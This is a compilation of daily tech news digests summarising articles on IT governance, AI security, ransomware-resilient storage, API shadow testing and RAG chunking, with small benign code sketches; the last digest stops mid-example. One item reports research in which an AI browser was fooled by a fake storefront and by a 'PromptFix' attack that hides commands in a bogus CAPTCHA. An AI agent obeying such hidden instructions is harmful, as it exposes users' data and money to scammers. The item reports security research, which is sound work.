
Daily Tech Digest - August 26, 2025


Quote for the day:

“When we give ourselves permission to fail, we, at the same time, give ourselves permission to excel.” -- Eloise Ristad


6 tips for consolidating your vendor portfolio without killing operations

Behind every sprawling vendor relationship is a series of small extensions that compound over time, creating complex entanglements. To improve flexibility when reviewing partners, Dovico is wary of vendor entanglements that complicate the ability to retire suppliers. Her aim is to clearly define the service required and the vendor’s capabilities. “You’ve got to be conscious of not muddying how you feel about the performance of one vendor, or your relationship with them. You need to have some competitive tension and align core competencies with your problem space,” she says. Klein prefers to adopt a cross-functional approach with finance and engineering input to identify redundancies and sprawl. Engineers with industry knowledge cross-reference vendor services, while IT checks against industry benchmarks, such as Gartner’s Magic Quadrant, to identify vendors providing similar services or tools. ... Vendor sprawl also lurks in the blind spot of cloud-based services that can be adopted without IT oversight, fueling shadow purchasing habits. “With the proliferation of SaaS and cloud models, departments can now make a few phone calls or sign up online to get applications installed or services procured,” says Klein. This shadow IT ecosystem increases security risks and vendor entanglement, undermining consolidation efforts. This needs to be tackled through changes to IT governance.


Should I stay or should I go? Rethinking IT support contracts before auto-renewal bites

Contract inertia, which is the tendency to stick with what you know, even when it may no longer be the best option, is a common phenomenon in business technology. There are several reasons for it, such as familiarity with an existing provider, fear of disruption, the administrative effort involved in reviewing and comparing alternatives, and sometimes just a simple lack of awareness that the renewal date is approaching. The problem is that inertia can quietly erode value. As organisations grow, shift priorities or adopt new technologies, the IT support they once chose may no longer be fit for purpose. ... A proactive approach begins with accountability. IT leaders need to know what their current provider delivers and how those services are being used across the company. Are remote software tools performing as expected? Are updates, patches and monitoring processes being applied consistently across all platforms? Are issues being resolved efficiently by our internal IT team, or are inefficiencies building up? Is this the correct set-up and structure for our business, or could we be making better use of existing internal capacity by leveraging better remote management tools? Gathering this information allows organisations to have an honest conversation with their provider (and themselves) about whether the contract still aligns with their objectives.


AI Data Security: Core Concepts, Risks, and Proven Practices

Although AI makes and fortifies a lot of our modern defenses, once you bring AI into the mix, the risks evolve too. Data security (and cybersecurity in general) has always worked like that. The security team gets a new tool, and eventually, the bad guys get one too. It’s a constant game of catch-up, and AI doesn’t change that dynamic. ... One of the simplest ways to strengthen AI data security is to control who can access what, early and tightly. That means setting clear roles, strong authentication, and removing access that people don’t need. No shared passwords. No default admin accounts. No “just for testing” tokens sitting around with full privileges. ... What your model learns is only as good (and safe) as the data you feed it. If the training pipeline isn’t secure, everything downstream is at risk. That includes the model’s behavior, accuracy, and resilience against manipulation. Always vet your data sources. Don’t rely on third-party datasets without checking them for quality, bias, or signs of tampering. ... A core principle of data protection, baked into laws like GDPR, is data minimization: only collect what you need, and only keep it for as long as you actually need it. In real terms, that means cutting down on excess data that serves no clear purpose. Put real policies in place. Schedule regular reviews. Archive or delete datasets that are no longer relevant. 
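To make the access-control advice concrete, here is a minimal sketch of deny-by-default, role-based permissions. The roles, actions, and resource names are hypothetical examples, not from any particular product.

```python
# Hypothetical sketch of least-privilege access control for an AI data store.
# Role names and resources are illustrative only.
from enum import Enum

class Role(Enum):
    DATA_SCIENTIST = "data_scientist"
    ML_ENGINEER = "ml_engineer"
    AUDITOR = "auditor"

# Each role gets only the permissions it needs: no default admin,
# no shared accounts, no "just for testing" full-privilege tokens.
PERMISSIONS = {
    Role.DATA_SCIENTIST: {"read:training_data"},
    Role.ML_ENGINEER: {"read:training_data", "write:model_artifacts"},
    Role.AUDITOR: {"read:access_logs"},
}

def is_allowed(role: Role, action: str) -> bool:
    """Deny by default; allow only explicitly granted actions."""
    return action in PERMISSIONS.get(role, set())

assert is_allowed(Role.ML_ENGINEER, "write:model_artifacts")
assert not is_allowed(Role.DATA_SCIENTIST, "write:model_artifacts")
```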


Morgan Stanley Open Sources CALM: The Architecture as Code Solution Transforming Enterprise DevOps

CALM enables software architects to define, validate, and visualize system architectures in a standardized, machine-readable format, bridging the gap between architectural intent and implementation. Built on a JSON Meta Schema, CALM transforms architectural designs into executable specifications that both humans and machines can understand. ... The framework structures architecture into three primary components: nodes, relationships, and metadata. This modular approach allows architects to model everything from high-level system overviews to detailed microservices architectures. ... CALM’s true power emerges in its seamless integration with modern DevOps workflows. The framework treats architectural definitions like any other code asset, version-controlled, testable, and automatable. Teams can validate architectural compliance in their CI/CD pipelines, catching design issues before they reach production. The CALM CLI provides immediate feedback on architectural decisions, enabling real-time validation during development. This shifts compliance left in the development lifecycle, transforming potential deployment roadblocks into preventable design issues. Key benefits for DevOps teams include machine-readable architecture definitions that eliminate manual interpretation errors, version control for architectural changes that provides clear change history, and real-time feedback on compliance violations that prevent downstream issues.
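For a sense of what "architecture as code" looks like in practice, here is an illustrative sketch of a CALM-style definition modeled as Python data, with the three primary components the article names: nodes, relationships, and metadata. The field names are assumptions for illustration; the real structure is defined by CALM's published JSON Meta Schema.

```python
# Illustrative, hypothetical CALM-style architecture definition.
# Consult the FINOS CALM JSON Meta Schema for the actual field names.
architecture = {
    "nodes": [
        {"unique-id": "web-app", "node-type": "service", "name": "Web App"},
        {"unique-id": "orders-db", "node-type": "database", "name": "Orders DB"},
    ],
    "relationships": [
        {
            "unique-id": "web-app-to-orders-db",
            "description": "Web App reads and writes order records",
            "source": "web-app",
            "target": "orders-db",
        }
    ],
    "metadata": {"owner": "payments-team", "reviewed": "2025-08-01"},
}

# Because the definition is plain, machine-readable data, a CI/CD pipeline
# can validate it (for example, with a JSON Schema validator) and fail the
# build when an architectural rule is violated.
```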


Shadow AI is surging — getting AI adoption right is your best defense

Despite the clarity of this progression, many organizations struggle to begin. One of the most common reasons is poor platform selection. Either no tool is made available, or the wrong class of tool is introduced. Sometimes what is offered is too narrow, designed for one function or team. Sometimes it is too technical, requiring configuration or training that most users aren’t prepared for. In other cases, the tool is so heavily restricted that users cannot complete meaningful work. Any of these mistakes can derail adoption. A tool that is not trusted or useful will not be used. And without usage, there is no feedback, value, or justification for scale. ... The best entry point is a general-purpose AI assistant designed for enterprise use. It must be simple to access, require no setup, and provide immediate value across a range of roles. It must also meet enterprise requirements for data security, identity management, policy enforcement, and model transparency. This is not a niche solution. It is a foundation layer. It should allow employees to experiment, complete tasks, and build fluency in a way that is observable, governable, and safe. Several platforms meet these needs. ChatGPT Enterprise provides a secure, hosted version of GPT-5 with zero data retention, administrative oversight, and SSO integration. It is simple to deploy and easy to use.


AI and the impact on our skills – the Precautionary Principle must apply

There is much public comment about AI replacing jobs or specific tasks within roles, and this is often cited as a source of productivity improvement. Often we hear about how junior legal professionals can be easily replaced since much of their work is related to the production of standard contracts and other documents, and these tasks can be performed by LLMs. We hear much of the same narrative from the accounting and consulting worlds. ... The greatest learning experiences come from making mistakes. Problem-solving skills come from experience. Intuition is a skill that is developed from repeatedly working in real-world environments. AI systems do make mistakes and these can be caught and corrected by a human, but it is not the same as the human making the mistake. Correcting the mistakes made by AI systems is in itself a skill, but a different one. ... In a rapidly evolving world in which AI has the potential to play a major role, it is appropriate that we apply the Precautionary Principle in determining how to automate with AI. The scientific evidence of the impact of AI-enabled automation is still incomplete, but more is being learned every day. However, skill loss is a serious, and possibly irreversible, risk. The integrity of education systems, the reputations of organisations and individuals, and our own ability to trust in complex decision-making processes, are at stake.


Ransomware-Resilient Storage: The New Frontline Defense in a High-Stakes Cyber Battle

The cornerstone of ransomware resilience is immutability: data written to storage can never be altered or deleted. This write-once-read-many capability means backup snapshots or data blobs are locked for prescribed retention periods, impervious to tampering even by attackers or system administrators with elevated privileges. Hardware and software enforce this immutability by preventing any writes or deletes on designated volumes, snapshots, or objects once committed, creating a "logical air gap" of protection without the need for physical media isolation. ... Moving deeper, efforts are underway to harden storage hardware directly. Technologies such as FlashGuard, explored experimentally by IBM and Intel collaborations, embed rollback capabilities within SSD controllers. By preserving prior versions of data pages on-device, FlashGuard can quickly revert files corrupted or encrypted by ransomware without network or host dependency. ... Though not widespread in production, these capabilities signal a future where storage devices autonomously resist ransomware impact, a powerful complement to immutable snapshotting. While these cutting-edge hardware-level protections offer rapid recovery and autonomous resilience, organizations also consider complementary isolation strategies like air-gapping to create robust multi-layered defense boundaries against ransomware threats.
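A minimal sketch of the write-once-read-many idea, assuming a toy in-memory object store; real systems enforce retention locks in storage hardware or firmware rather than application code, which is what keeps even privileged accounts from bypassing them.

```python
# Toy sketch of WORM-style retention enforcement (illustrative only).
import time

class ImmutableStore:
    def __init__(self, retention_seconds: int):
        self.retention_seconds = retention_seconds
        self._objects = {}  # key -> (data, locked_until timestamp)

    def write(self, key: str, data: bytes) -> None:
        if key in self._objects:
            raise PermissionError("object is write-once")
        self._objects[key] = (data, time.time() + self.retention_seconds)

    def delete(self, key: str) -> None:
        _, locked_until = self._objects[key]
        # Even an administrator cannot delete before the retention clock expires.
        if time.time() < locked_until:
            raise PermissionError("retention lock active")
        del self._objects[key]
```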


How an Internal AI Governance Council Drives Responsible Innovation

The efficacy of AI governance hinges on the council’s composition and operational approach. An optimal governance council typically includes cross-functional representation from executive leadership, IT, compliance and legal teams, human resources, product management, and frontline employees. This diversified representation ensures comprehensive coverage of ethical considerations, compliance requirements, and operational realities. Initial steps in operationalizing a council involve creating strong AI usage policies, establishing approved tools, and developing clear monitoring and validation protocols. ... While initial governance frameworks often focus on strict risk management and regulatory compliance, the long-term goal shifts toward empowerment and innovation. Mature governance practices balance caution with enablement, providing organizations with a dynamic, iterative approach to AI implementation. This involves reassessing and adapting governance strategies, aligning them with evolving technologies, organizational objectives, and regulatory expectations. AI’s non-deterministic, probabilistic nature, particularly generative models, necessitates a continuous human oversight component. Effective governance strategies embed this human-in-the-loop approach, ensuring AI enhances decision-making without fully automating critical processes.


The energy sector has no time to wait for the next cyberattack

Recent findings have raised concerns about solar infrastructure. Some Chinese-made solar inverters were found to have built-in communication equipment that isn’t fully explained. In theory, these devices could be triggered remotely to shut down inverters, potentially causing widespread power disruptions. The discovery has raised fears that covert malware may have been installed in critical energy infrastructure across the U.S. and Europe, which could enable remote attacks during conflicts. ... Many OT systems were built decades ago and weren’t designed with cyber threats in mind. They often lack updates, patches, and support, and older software and hardware don’t always work with new security solutions. Upgrading them without disrupting operations is a complex task. OT systems used to be kept separate from the Internet to prevent remote attacks. Now, the push for real-time data, remote monitoring, and automation has connected these systems to IT networks. That makes operations more efficient, but it also gives cybercriminals new ways to exploit weaknesses that were once isolated. Energy companies are cautious about overhauling old systems because it’s expensive and can interrupt service. But keeping legacy systems in play creates security gaps, especially when connected to networks or IoT devices. Protecting these systems while moving to newer, more secure tech takes planning, investment, and IT-OT collaboration.


Agentic AI Browser an Easy Mark for Online Scammers

In a Wednesday blog post, researchers from Guardio wrote that Comet - one of the first AI browsers to reach consumers - clicked through fake storefronts, submitted sensitive data to phishing sites and failed to recognize malicious prompts designed to hijack its behavior. The Tel Aviv-based security firm calls the problem "scamlexity," a messy intersection of human-like automation and old-fashioned social engineering that creates "a new, invisible scam surface" scaling to millions of potential victims at once. In a clash between the sophistication of generative models built into browsers and the simplicity of phishing tricks that have trapped users for decades, "even the oldest tricks in the scammer's playbook become more dangerous in the hands of AI browsing." One of the headline features of AI browsers is one-click shopping. Researchers spun up a fake "Walmart" storefront complete with polished design, realistic listings and a seamless checkout flow. ... Rather than fooling a user into downloading malicious code to putatively fix a computer problem - as in ClickFix - a PromptFix attack hides a malicious instruction inside what looks like a CAPTCHA. The AI treated the bogus challenge as routine, obeyed the hidden command and continued execution. AI agents are expected to ingest unstructured logs, alerts or even attacker-generated content during incident response.

Daily Tech Digest - April 03, 2025


Quote for the day:

"The most difficult thing is the decision to act, the rest is merely tenacity." -- Amelia Earhart


Veterans are an obvious fit for cybersecurity, but tailored support ensures they succeed

Both civilian and military leaders have long seen veterans as strong candidates for cybersecurity roles. The National Initiative for Cybersecurity Careers and Studies, part of the US Cybersecurity and Infrastructure Security Agency (CISA), speaks directly to veterans, saying “Your skills and training from the military translate well to a cyber career.” NICCS continues, “Veterans’ backgrounds in managing high-pressure situations, attention to detail, and understanding of secure communications make them particularly well-suited for this career path.” Gretchen Bliss, director of cybersecurity programs at the University of Colorado at Colorado Springs (UCCS), speaks specifically to security execs on the matter: “If I were talking to a CISO, I’d say get your hands on a veteran. They understand the practical application piece, the operational piece, they have hands-on experience. They think things through, they know how to do diagnostics. They already know how to tackle problems.” ... And for veterans who haven’t yet mastered all that, Andrus advises “networking with people who actually do the job you want.” He also advises veterans to learn about the environment at the organization they seek to join, asking themselves whether they’d fit in. And he recommends connecting with others to ease the transition.


The 6 disciplines of strategic thinking

A strategic thinker is not just a good worker who approaches a challenge with the singular aim of resolving the problem in front of them. Rather, a strategic thinker looks at and elevates their entire ecosystem to achieve a robust solution. ... The first discipline is pattern recognition. A foundation of strategic thinking is the ability to evaluate a system, understand how all its pieces move, and derive the patterns they typically form. ... Watkins’s next discipline, and an extension of pattern recognition, is systems analysis. It is easy to get overwhelmed when breaking down the functional elements of a system. A strategic thinker avoids this by creating simplified models of complex patterns and realities. ... Mental agility is Watkins’s third discipline. Because the systems and patterns of any work environment are so dynamic, leaders must be able to change their perspective quickly to match the role they are examining. Systems evolve, people grow, and the larger picture can change suddenly. ... Structured problem-solving is a discipline you and your team can use to address any issue or challenge. The idea of problem-solving is self-explanatory; the essential element is the structure. Developing and defining a structure will ensure that the correct problem is addressed in the most robust way possible.


Why Vendor Relationships Are More Important Than Ever for CIOs

Trust is the necessary foundation, which is built through open communication, solid performance, relevant experience, and proper security credentials and practices. “People buy from people they trust, no matter how digital everything becomes,” says Thompson. “That human connection remains crucial, especially in tech where you're often making huge investments in mission-critical systems.” ... An executive-level technology governance framework helps ensure effective vendor oversight. According to Malhotra, it should consist of five key components, including business relationship management, enterprise technology investment, transformation governance, value capture and having the right culture and change management in place. Beneath the technology governance framework is active vendor governance, which institutionalizes oversight across ten critical areas including performance management, financial management, relationship management, risk management, and issues and escalations. Other considerations include work order management, resource management, contract and compliance, having a balanced scorecard across vendors and principled spend and innovation.


Shadow Testing Superpowers: Four Ways To Bulletproof APIs

API contract testing is perhaps the most immediately valuable application of shadow testing. Traditional contract testing relies on mock services and schema validation, which can miss subtle compatibility issues. Shadow testing takes contract validation to the next level by comparing actual API responses between versions. ... Performance testing is another area where shadow testing shines. Traditional performance testing usually happens late in the development cycle in dedicated environments with synthetic loads that often don’t reflect real-world usage patterns. ... Log analysis is often overlooked in traditional testing approaches, yet logs contain rich information about application behavior. Shadow testing enables sophisticated log comparisons that can surface subtle issues before they manifest as user-facing problems. ... Perhaps the most innovative application of shadow testing is in the security domain. Traditional security testing often happens too late in the development process, after code has already been deployed. Shadow testing enables a true shift left for security by enabling dynamic analysis against real traffic patterns. ... What makes these shadow testing approaches particularly valuable is their inherently low-maintenance nature. 
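As a rough illustration of response-level contract validation, here is a hedged sketch that mirrors the same request to a shadow deployment and diffs the two responses. The endpoint URLs and the assumption of flat JSON object bodies are illustrative, not from any particular tool.

```python
# Sketch of shadow-testing an API: send the same request to production and
# to the candidate version, then diff status codes and top-level JSON fields.
import requests  # assumes the 'requests' package is installed

PROD = "https://api.example.com/v1"      # hypothetical endpoints
SHADOW = "https://shadow.api.example.com/v2"

def shadow_compare(path: str, params: dict) -> list[str]:
    prod_resp = requests.get(f"{PROD}{path}", params=params, timeout=5)
    shadow_resp = requests.get(f"{SHADOW}{path}", params=params, timeout=5)
    diffs = []
    if prod_resp.status_code != shadow_resp.status_code:
        diffs.append(f"status: {prod_resp.status_code} != {shadow_resp.status_code}")
    prod_body, shadow_body = prod_resp.json(), shadow_resp.json()
    # Compare every field present in either version (assumes flat objects).
    for key in set(prod_body) | set(shadow_body):
        if prod_body.get(key) != shadow_body.get(key):
            diffs.append(f"field '{key}' differs")
    return diffs  # an empty list means the versions agree on this request
```

Run against mirrored real traffic rather than synthetic fixtures, a diff like this surfaces the subtle compatibility issues that mock-based contract tests can miss.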


Rethinking technology and IT's role in the era of agentic AI and digital labor

Rethinking technology and the role of IT will drive a shift from the traditional model to a business technology-focused model. One example will be the shift from one large, dedicated IT team that traditionally handles an organization's technology needs, overseen and directed by the CIO, to more focused IT teams that will perform strategic, high-value activities and help drive technology innovation strategy as Gen AI handles many routine IT tasks. Another shift will be spending and budget allocations. Traditionally, CIOs manage the enterprise IT budget and allocation. In the new model, spending on enterprise-wide IT investments continues to be assessed and guided by the CIO, and some enterprise technology investments are now governed and funded by the business units. ... Today, agentic AI is not just answering questions -- it's creating. Agents take action autonomously. And it's changing everything about how technology-led enterprises must design, deploy, and manage new technologies moving forward. We are building self-driving autonomous businesses using agentic AI where humans and machines work together to deliver customer success. However, giving agency to software or machines to act will require a new currency. Trust is the new currency of AI.


From Chaos to Control: Reducing Disruption Time During Cyber Incidents and Breaches

Cyber disruptions are no longer isolated incidents; they have ripple effects that extend across industries and geographic regions. In 2024, two high-profile events underscored the vulnerabilities in interconnected systems. The CrowdStrike IT outage resulted in widespread airline cancellations, impacting financial markets and customer trust, while the Change Healthcare ransomware attack disrupted claims processing nationwide, costing billions in financial damages. These cases emphasize why resilience professionals must proactively integrate automation and intelligence into their incident response strategies. ... Organizations need structured governance models that define clear responsibilities before, during, and after an incident. AI-driven automation enables proactive incident detection and streamlined responses. Automated alerts, digital action boards, and predefined workflows allow teams to act swiftly and decisively, reducing downtime and minimizing operational losses. Data is the foundation of effective risk and resilience management. When organizations ensure their data is reliable and comprehensive, they gain an integrated view that enhances visibility across business continuity, IT, and security teams. 


What does an AI consultant actually do?

AI consulting involves advising on, designing and implementing artificial intelligence solutions. The spectrum is broad, ranging from process automation using machine learning models to setting up chatbots and performing complex analyses using deep learning methods. However, the definition of AI consulting goes beyond the purely technical perspective. It is an interdisciplinary approach that aligns technological innovation with business requirements. AI consultants are able to design technological solutions that are not only efficient but also make strategic sense. ... All in all, both technical and strategic thinking is required: Unlike some other technology professions, AI consulting not only requires in-depth knowledge of algorithms and data processing, but also strategic and communication skills. AI consultants talk to software development and IT departments as well as to management, product management or employees from the relevant field. They have to explain technical interrelations clearly and comprehensibly so that the company can make decisions based on this knowledge. Since AI technologies are developing rapidly, continuous training is important: online courses, boot camps and certificates, as well as workshops and conferences.


Building a cybersecurity strategy that survives disruption

The best strategies treat resilience as a core part of business operations, not just a security add-on. “The key to managing resilience is to approach it like an onion,” says James Morris, Chief Executive of The CSBR. “The best strategy is to be effective at managing the perimeter. This approach will allow you to get a level of control on internal and external forces which are key to long-term resilience.” That layered thinking should be matched by clearly defined policies and procedures. “Ensure that your ‘resilience’ strategy and policies are documented in detail,” Morris advises. “This is critical for response planning, but also for any legal issues that may arise. If it’s not documented, it doesn’t happen.” ... Move beyond traditional monitoring by implementing advanced, behaviour-based anomaly detection and AI-driven solutions to identify novel threats. Invest in automation to enhance the efficiency of detection, triage, and initial response tasks, while orchestration platforms enable coordinated workflows across security and IT tools, significantly boosting response agility. ... A good strategy starts with the idea that stuff will break. So you need things like segmentation, backups, and backup plans for your backup plans, along with alternate ways to get back up and running. Fast, reliable recovery is key. Just having backups isn’t enough anymore.


3 key features in Kong AI Gateway 3.10

For teams working with sensitive or regulated data, protecting personally identifiable information (PII) in AI workflows is not optional; it’s essential for proper governance. Developers often use regex libraries or handcrafted filters to redact PII, but these DIY solutions are prone to error, inconsistent enforcement, and missed edge cases. Kong AI Gateway 3.10 introduces out-of-the-box PII sanitization, giving platform teams a reliable, enterprise-grade solution to scrub sensitive information from prompts before they reach the model and, if needed, reinsert sanitized data in the response before it returns to the end user. ... As organizations adopt multiple LLM providers and model types, complexity can grow quickly. Different teams may prefer OpenAI, Claude, or open-source models like Llama or Mistral. Each comes with its own SDKs, APIs, and limitations. Kong AI Gateway 3.10 solves this with universal API support and native SDK integration. Developers can continue using the SDKs they already rely on (e.g., AWS, Azure) while Kong translates requests at the gateway level to interoperate across providers. This eliminates the need for rewriting app logic when switching models and simplifies centralized governance. This latest release also includes cost-based load balancing, enabling Kong to route requests based on token usage and pricing.
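To see why handcrafted filters fall short, consider a naive DIY redactor of the kind the release is meant to replace. The patterns below are deliberately simple examples: they miss international phone formats, names, addresses, and countless edge cases, which is precisely the argument for gateway-level sanitization.

```python
# A naive DIY PII redactor, shown to illustrate the approach the article
# warns about. Patterns are illustrative and deliberately incomplete.
import re

PATTERNS = {
    "EMAIL": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "SSN": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "PHONE": re.compile(r"\b\d{3}[-.]\d{3}[-.]\d{4}\b"),
}

def redact(prompt: str) -> str:
    # Replace each match with a placeholder label before the prompt
    # leaves for the model.
    for label, pattern in PATTERNS.items():
        prompt = pattern.sub(f"[{label}]", prompt)
    return prompt

print(redact("Reach me at jane.doe@example.com or 555-867-5309."))
# -> "Reach me at [EMAIL] or [PHONE]."
```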


The future of IT operations with Dark NOC

From a Managed Service Provider (MSP) perspective, Dark NOC will shift the way IT operates today by making it more efficient, scalable, and cost-effective. It will replace the traditional NOC’s manual-intensive task of continuous monitoring, diagnosing, and resolving issues across multiple customer environments. ... Another key benefit Dark NOC brings MSPs is scalability. Its analytics and automation capability allows it to manage thousands of endpoints effortlessly without proportionally increasing engineers’ headcount. This enables MSPs to extend their service portfolios, onboard new customers, and increase profit margins while retaining a lean operational model. From a competitive point of view, adopting Dark NOC enables MSPs to differentiate themselves from competitors by offering proactive, AI-driven IT services that minimise downtime, enhance security and maximise performance. Dark NOC helps MSPs provide premium service at affordable price points to customers while making a decent margin internally. ... Cloud infrastructure monitoring and management provides real-time cloud resource monitoring and predictive insights; examples include AWS CloudWatch, Azure Monitor, and Google Cloud Operations Suite.

Daily Tech Digest - December 28, 2024

Forcing the SOC to change its approach to detection

Make no mistake, we are not talking about the application of AI in the usual sense when it comes to threat detection. Up until now, AI has seen Large Language Models (LLMs) used to do little more than summarise findings for reporting purposes in incident response. Instead, we are referring to the application of AI in its truer and broader sense, i.e. via machine learning, agents, graphs, hypergraphs and other approaches – and these promise to make detection both more precise and intelligible. Hypergraphs give us the power to connect hundreds of observations together to form likely chains of events. ... The end result is that the security analyst is no longer perpetually caught in firefighting mode. Rather than having to respond to hundreds of alerts a day, the analyst can use the hypergraphs and AI to detect and string together long chains of alerts that share commonalities and in so doing gain a complete picture of the threat. Realistically, it’s expected that adopting such an approach should see alert volumes decline by up to 90 per cent. But it doesn’t end there. By applying machine learning to the chains of events it will be possible to prioritise response, identifying which threats require immediate triage.
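One way to picture the chaining idea: group alerts that share any indicator (host, user, file hash) into a single chain. The union-find sketch below is a simplified approximation of the graph-based approach described above, using a made-up alert format.

```python
# Hedged sketch: cluster alerts into chains when they share any indicator.
# Alert format is hypothetical; real pipelines would weight and score edges.
from collections import defaultdict

def chain_alerts(alerts: list[dict]) -> list[list[dict]]:
    parent = list(range(len(alerts)))

    def find(i: int) -> int:
        while parent[i] != i:
            parent[i] = parent[parent[i]]  # path halving
            i = parent[i]
        return i

    def union(i: int, j: int) -> None:
        parent[find(i)] = find(j)

    # Map each indicator value (host, user, hash, ...) to the alerts citing it.
    seen = defaultdict(list)
    for idx, alert in enumerate(alerts):
        for value in alert["indicators"]:
            seen[value].append(idx)
    # Alerts sharing an indicator end up in the same set.
    for indices in seen.values():
        for other in indices[1:]:
            union(indices[0], other)

    chains = defaultdict(list)
    for idx, alert in enumerate(alerts):
        chains[find(idx)].append(alert)
    return list(chains.values())  # hundreds of alerts -> a handful of chains
```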


Sole Source vs. Single Source Vendor Management

A sole source is a vendor that provides a specific product or service to your company. This vendor makes a specific widget or service that is custom tailored to your company’s needs. If there is an event at this sole source provider, your company can only wait until the event has been resolved. There is no other vendor that can produce your product or service quickly. They are the sole source, on a critical path to your operations. From an oversight and assessment perspective, this can be a difficult relationship in which to mitigate risks to your company. With sole source companies, we as practitioners must do a deeper dive into these companies from a risk assessment perspective. From a vendor audit perspective, we need to go into more detail about how robust their business continuity, disaster recovery, and crisis management programs are. ... A single source provider is one company you choose to do business with for a given product or service, even though other providers could supply the same product or service. An example of a single source provider is a payment processing company. There are many to choose from, but you chose one specific company to do business with. Moving to a new single source provider can be a daunting task that involves a new RFP process, process integration, assessments of their business continuity program, etc.


Central Africa needs traction on financial inclusion to advance economic growth

Beyond the infrastructure, financial inclusion would see a leap forward in CEMAC if the right policies and platforms exist. “The number two thing is that you have to have the right policies in place which are going to establish what would constitute acceptable identity authentication for identity transactions. So, be it for onboarding or identity transactions, you have to have a policy. Saying that we’re going to do biometric authentication for every transaction, no matter what value it is and what context it is, doesn’t make any sense,” Atick holds. “You have to have a policy that is basically a risk-based policy. And we have lots of experience in that. Some countries started with their own policies, and over time, they started to understand it. Luckily, there is a lot of knowledge now that we can share on this point. This is why we’re doing the Financial Inclusion Symposium at the ID4Africa Annual General Meeting next year [in Addis Ababa], because these countries are going to share their knowledge and experiences.” “The symposium at the AGM will basically be on digital identity and finance. It’s going to focus on the stages of financial inclusion, and what are the risk-based policies countries must put in place to achieve the desired outcome, which is a low-cost, high-robustness and trustworthy ecosystem that enables anybody to enter the system and to conduct transactions securely.”


2025 Data Outlook: Strategic Insights for the Road Ahead

By embracing localised data processing, companies can turn compliance into an advantage, driving innovations such as data barter markets and sovereignty-specific data products. Data sovereignty isn’t merely a regulatory checkbox—it’s about Citizen Data Rights. With most consumer data being unstructured and often ignored, organisations can no longer afford complacency. Prioritising unstructured data management will be crucial as personal information needs to be identified, cataloged, and protected at a granular level from inception through intelligent, policy-based automation. ... Individuals are gaining more control over their personal information and expect transparency, control, and digital trust from organisations. As a result, businesses will shift to self-service data management, enabling data stewards across departments to actively participate in privacy practices. This evolution moves privacy management out of IT silos, embedding it into daily operations across the organisation. Organisations that embrace this change will implement a “Data Democracy by Design” approach, incorporating self-service privacy dashboards, personalised data management workflows, and Role-Based Access Control (RBAC) for data stewards. 


Defining & Defying Cybersecurity Staff Burnout

According to the van Dam article, burnout happens when an employee buries their experience of chronic stress for years. The people who burn out are often formerly great performers, perfectionists who exhibit perseverance. But if the person perseveres in a situation where they don't have control, they can experience the kind of morale-killing stress that, left unaddressed for months and years, leads to burnout. In such cases, "perseverance is not adaptive anymore and individuals should shift to other coping strategies like asking for social support and reflecting on one's situation and feelings," the article read. ... Employees sometimes scoff at the wellness programs companies put out as an attempt to keep people healthy. "Most 'corporate' solutions — use this app! attend this webinar! — felt juvenile and unhelpful," Eden says. And it does seem like many solutions fall into the same quick-fix category as home improvement hacks or dump dinner recipes. Christina Maslach's scholarly work attributed work stress to six main sources: workload, values, reward, control, fairness, and community. An even quicker assessment is promised by the Matches Measure from Cindy Muir Zapata. 


Revolutionizing Cloud Security for Future Threats

Is it possible that embracing Non-Human Identities can help us bridge the resource gap in cybersecurity? The answer is a definite yes. The cybersecurity field is chronically understaffed and for firms to successfully safeguard their digital assets, they must be equipped to handle an infinite number of parallel tasks. This demands a new breed of solutions such as NHIs and Secrets Security Management that offer automation at a scale hitherto unseen. NHIs have the potential to take over tedious tasks like secret rotation, identity lifecycle management, and security compliance management. By automating these tasks, NHIs free up the cybersecurity workforce to concentrate on more strategic initiatives, thereby improving the overall efficiency of your security operations. Moreover, through AI-enhanced NHI Management platforms, we can provide better insights into system vulnerabilities and usage patterns, considerably improving context-aware security. Can the concept of Non-Human Identities extend its relevance beyond the IT sector? ... From healthcare institutions safeguarding sensitive patient data, financial services firms securing transactional data, travel companies protecting customer data, to DevOps teams looking to maintain the integrity of their codebases, the strategic relevance of NHIs is widespread.


Digital Transformation: Making Information Work for You

Digital transformation is changing the organization from one state to another through the use of electronic devices that leverage information. Oftentimes, this entails process improvement and process reengineering to convert business interactions from human-to-human to human-to-computer-to-human. By introducing the element of the computer into human-to-human transactions, there is a digital breadcrumb left behind. This digital record of the transaction is important in making digital transformations successful and is the key to how analytics can enable more successful digital transformations. In a human-to-human interaction, information is transferred from one party to another, but it generally stops there. With the introduction of the digital element in the middle, the data is captured, stored, and available for analysis, dissemination, and amplification. This is where data analytics shines. If an organization stops with data storage, they are missing the lion’s share of the potential value of a digital transformation initiative. Organizations that focus only on collecting data from all their transactions and sinking this into a data lake often find that their efforts are in vain. They end up with a data swamp where data goes to die and never fully realize its potential value. 


Secure and Simplify SD-Branch Networks

The traditional WAN relies on expensive MPLS connectivity and a hub-and-spoke architecture that backhauls all traffic through the corporate data centre for centralized security checks. This approach creates bottlenecks that interfere with network performance and reliability. In addition to users demanding fast and reliable access to resources, IoT applications need reliable WAN connections to leverage cloud-based management and big data repositories. ... To reduce complexity and appliance sprawl, SD-Branch consolidates networking and security capabilities into a single solution that provides seamless protection of distributed environments. It covers all critical branch edges, from the WAN edge to the branch access layer to a full spectrum of endpoint devices. 


Breaking up is hard to do: Chunking in RAG applications

The most basic is to chunk text into fixed sizes. This works for fairly homogenous datasets that use content of similar formats and sizes, like news articles or blog posts. It’s the cheapest method in terms of the amount of compute you’ll need, but it doesn’t take into account the context of the content that you’re chunking. That might not matter for your use case, but it might end up mattering a lot. You could also use random chunk sizes if your dataset is a non-homogenous collection of multiple document types. This approach can potentially capture a wider variety of semantic contexts and topics without relying on the conventions of any given document type. Random chunks are a gamble, though, as you might end up breaking content across sentences and paragraphs, leading to meaningless chunks of text. For both of these types, you can apply the chunking method over sliding windows; that is, instead of starting new chunks at the end of the previous chunk, new chunks overlap the content of the previous one and contain part of it. This can better capture the context around the edges of each chunk and increase the semantic relevance of your overall system. The tradeoff is that it increases storage requirements and can store redundant information.
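A minimal sketch of fixed-size chunking with a sliding window, as described above. Sizes here are in characters for simplicity; production systems usually count tokens instead.

```python
# Fixed-size chunking with overlap: each new chunk starts before the
# previous one ends, so context at the chunk edges is preserved.
def chunk_text(text: str, chunk_size: int = 500, overlap: int = 100) -> list[str]:
    if overlap >= chunk_size:
        raise ValueError("overlap must be smaller than chunk_size")
    step = chunk_size - overlap
    return [text[i:i + chunk_size] for i in range(0, len(text), step)]

# Each chunk repeats the last `overlap` characters of the one before it:
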